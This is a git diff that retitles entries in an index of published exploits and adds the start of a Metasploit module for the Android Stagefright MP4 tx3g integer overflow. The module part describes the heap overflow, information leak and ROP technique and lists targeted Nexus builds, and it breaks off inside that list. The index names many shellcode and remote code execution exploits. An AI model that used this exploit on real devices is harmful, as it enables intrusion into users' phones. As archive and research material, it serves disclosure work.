 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38096,platforms/linux/remote/38096.rb,"Endian Firewall - Password Change Command Injection (Metasploit)",2015-09-07,Metasploit,linux,remote,10443
-38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
+38097,platforms/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081
 38105,platforms/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80
 38108,platforms/windows/dos/38108.txt,"Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
@@ -34509,7 +34513,7 @@ id,file,description,date,author,platform,type,port
 38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
 38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
-38124,platforms/android/remote/38124.py,"Android (Stagefright) - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
+38124,platforms/android/remote/38124.py,"Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
 38125,platforms/php/dos/38125.txt,"PHP - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
 38127,platforms/php/webapps/38127.php,"PHP - cgimode fpm writeprocmemfile Bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
@@ -34576,7 +34580,7 @@ id,file,description,date,author,platform,type,port
 38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80
 38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - Cross-Site Request Forgery",2015-09-15,hyp3rlinx,jsp,webapps,80
 38194,platforms/android/shellcode/38194.c,"Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
-38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL (MS15-100)",2015-09-15,Metasploit,windows,remote,0
+38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL Exploit (MS15-100)",2015-09-15,Metasploit,windows,remote,0
 38196,platforms/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,php,remote,80
 38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80
 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
@@ -34605,7 +34609,7 @@ id,file,description,date,author,platform,type,port
 38223,platforms/php/webapps/38223.txt,"ZeusCart 4.0 - Cross-Site Request Forgery",2015-09-17,"Curesec Research Team",php,webapps,80
 38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80
 38225,platforms/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos,0
-38226,platforms/android/remote/38226.py,"Android libstagefright - Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0
+38226,platforms/android/remote/38226.py,"Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0
 38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0
 38228,platforms/php/webapps/38228.txt,"phpLiteAdmin - 'table' Parameter SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0
 38229,platforms/php/webapps/38229.txt,"IP.Gallery - 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0
@@ -35429,7 +35433,7 @@ id,file,description,date,author,platform,type,port
 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80
 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0
 39088,platforms/php/webapps/39088.txt,"Joomla! Plugin Projoom NovaSFH - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0
-39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0
+39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0
 39090,platforms/php/webapps/39090.php,"WordPress Theme Kiddo - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0
 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0
 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0
@@ -35498,7 +35502,7 @@ id,file,description,date,author,platform,type,port
 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0
 39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
 39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
-39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0
+39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit",2016-01-04,"Google Security Research",multiple,dos,0
 39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0
 39166,platforms/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)",2016-01-05,rebel,linux,local,0
 39167,platforms/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",php,webapps,80
@@ -35735,7 +35739,7 @@ id,file,description,date,author,platform,type,port
 39409,platforms/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
 39410,platforms/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80
 39411,platforms/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80
-39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0
+39412,platforms/hardware/webapps/39412.txt,"Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0
 39413,platforms/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80
 39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",php,webapps,80
 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
@@ -35788,7 +35792,7 @@ id,file,description,date,author,platform,type,port
 39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0
 39468,platforms/php/webapps/39468.txt,"Vesta Control Panel 0.9.8-15 - Persistent Cross-Site Scripting",2016-02-18,"Necmettin COSKUN",php,webapps,0
 39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - Cross-Site Request Forgery",2016-02-18,"Necmettin COSKUN",php,webapps,0
-39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote Denial of Service",2016-02-19,"Pawan Lal",windows,dos,0
+39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service",2016-02-19,"Pawan Lal",windows,dos,0
 39471,platforms/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow SEH (Denial of Service)",2016-02-19,"Shantanu Khandelwal",windows,dos,0
 39472,platforms/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service",2016-02-19,"Shantanu Khandelwal",windows,dos,0
 39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject",2016-02-19,Vulnerability-Lab,php,webapps,0
@@ -35831,7 +35835,7 @@ id,file,description,date,author,platform,type,port
 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
-39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
+39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
 39517,platforms/windows/dos/39517.py,"FreeProxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - '.bmp' Crash (PoC)",2016-03-02,redknight99,windows,dos,0
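Review bot: Row 39515 names the product `Netgear ProSafe Network Management System 300`, while row 39412 (retitled in the hunk at -35735) calls it `Netgear ProSafe Network Management System NMS300`; these are presumably the same product, so a keyword search on one spelling will miss the other entry. Use one form in both rows, for example `"Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit)"` here.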
@@ -35932,7 +35936,7 @@ id,file,description,date,author,platform,type,port
 39623,platforms/php/webapps/39623.txt,"WordPress Plugin Photocart Link 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
-39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69
+39627,platforms/windows/dos/39627.py,"TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69
 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation",2016-03-28,"Google Security Research",linux,local,0
 39629,platforms/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0
 39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege",2016-03-28,mr_me,windows,local,0
@@ -35944,7 +35948,7 @@ id,file,description,date,author,platform,type,port
 39637,platforms/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80
 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0
 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution (Metasploit)",2016-03-30,Metasploit,php,remote,80
-39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0
+39640,platforms/android/remote/39640.txt,"Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)",2016-03-30,NorthBit,android,remote,0
 39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin)",2016-03-31,LiquidWorm,hardware,webapps,80
 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080
 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,java,remote,8080
@@ -36226,7 +36230,7 @@ id,file,description,date,author,platform,type,port
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39936,platforms/php/webapps/39936.txt,"Joomla! Extension PayPlans (com_payplans) 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
-39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - Remote Code Execution with API JSON-RPC",2016-06-13,"Alexander Gurin",php,webapps,80
+39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80
 39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0
 39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
 39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
@@ -36416,6 +36420,7 @@ id,file,description,date,author,platform,type,port
 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23
+40168,platforms/php/webapps/40168.txt,"Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-27,"Vinesh Redkar",php,webapps,80
 40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0
 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
@@ -36439,7 +36444,7 @@ id,file,description,date,author,platform,type,port
 40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
 40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
 40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
-40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
+40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
@@ -36470,10 +36475,10 @@ id,file,description,date,author,platform,type,port
 40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0
 40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0
 40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80
-40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation",2016-08-12,pgt,linux,remote,0
+40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0
 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0
 40281,platforms/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
-40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
+40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
 40279,platforms/windows/remote/40279.py,"Microsoft Windows - NetAPI32.dll Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0
 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0
 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80
@@ -36553,3 +36558,4 @@ id,file,description,date,author,platform,type,port
 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
+40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
diff --git a/platforms/android/remote/40436.rb b/platforms/android/remote/40436.rb
new file mode 100755
index 000000000..376e9f010
--- /dev/null
+++ b/platforms/android/remote/40436.rb
@@ -0,0 +1,1212 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + + def initialize(info={}) + super(update_info(info, + 'Name' => "Android Stagefright MP4 tx3g Integer Overflow", + 'Description' => %q{ + This module exploits a integer overflow vulnerability in the Stagefright + Library (libstagefright.so). The vulnerability occurs when parsing specially + crafted MP4 files. While a wide variety of remote attack vectors exist, this + particular exploit is designed to work within an HTML5 compliant browser. + + Exploitation is done by supplying a specially crafted MP4 file with two + tx3g atoms that, when their sizes are summed, cause an integer overflow when + processing the second atom. As a result, a temporary buffer is allocated + with insufficient size and a memcpy call leads to a heap overflow. + + This version of the exploit uses a two-stage information leak based on + corrupting the MetaData that the browser reads from mediaserver. This method + is based on a technique published in NorthBit's Metaphor paper. First, + we use a variant of their technique to read the address of a heap buffer + located adjacent to a SampleIterator object as the video HTML element's + videoHeight. Next, we read the vtable pointer from an empty Vector within + the SampleIterator object using the video element's duration. This gives + us a code address that we can use to determine the base address of + libstagefright and construct a ROP chain dynamically. + + NOTE: the mediaserver process on many Android devices (Nexus, for example) is + constrained by SELinux and thus cannot use the execve system call. 
To avoid + this problem, the original exploit uses a kernel exploit payload that disables + SELinux and spawns a shell as root. Work is underway to make the framework + more amenable to these types of situations. Until that work is complete, this + exploit will only yield a shell on devices without SELinux or with SELinux in + permissive mode. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + # Exodus/jordan # initial discovery / disclosure + 'jduck', # Metasploit module, further infoleak development + 'NorthBit' # intiial information leak implementation + ], + 'References' => + [ + [ 'CVE', '2015-3864' ], + [ 'URL', 'https://blog.exodusintel.com/2015/08/13/stagefright-mission-accomplished/' ], + [ 'URL', 'http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html' ], + [ 'URL', 'https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf' ], + [ 'URL', 'https://github.com/NorthBit/Metaphor' ], + # Not used, but related + [ 'URL', 'http://drops.wooyun.org/papers/7558' ], + [ 'URL', 'http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html' ], + [ 'URL', 'https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/' ], + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true, + }, + #'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp' }, + 'Platform' => 'linux', + 'Arch' => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X86_64, ARCH_MIPSLE], + 'Targets' => + [ + [ 'Automatic', {} ], + # + # Each target includes information about the device, firmware, and + # how exactly to about exploiting it. + # + # Primarily, these targets are used to map a browser's User-Agent to + # exploit specifics for that device / build. 
+ # + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX21P', + 'Release' => '5.0', + 'Rop' => 'lrx', + 'SprayAddress' => 0xb1508000 + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX22C', + 'Release' => '5.0.1', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX22G', + 'Release' => '5.0.2', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47O', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47V', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY48G', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY48I', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX22G', + 'Release' => '5.0.2', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47O', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47V', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.0 (LRX21O)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LRX21O', + 'Release' => '5.0', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LRX22C', + 'Release' => '5.0.1', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 5 
(hammerhead) with Android 5.1 (LMY47D)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY47D', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.1 (LMY47I)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY47I', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY48B', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY48I', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.0 (LRX21O)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LRX21O', + 'Release' => '5.0', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.0.1 (LRX22C)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LRX22C', + 'Release' => '5.0.1', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47D)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47D', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47E)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47E', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47I)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47I', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LYZ28E', + 'Release' => '5.1.1', + 'Rop' => 'shamu / LYZ28E' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47M)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47M', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47Z', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LVY48C)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LVY48C', + 'Release' => '5.1.1', + 'Rop' => 
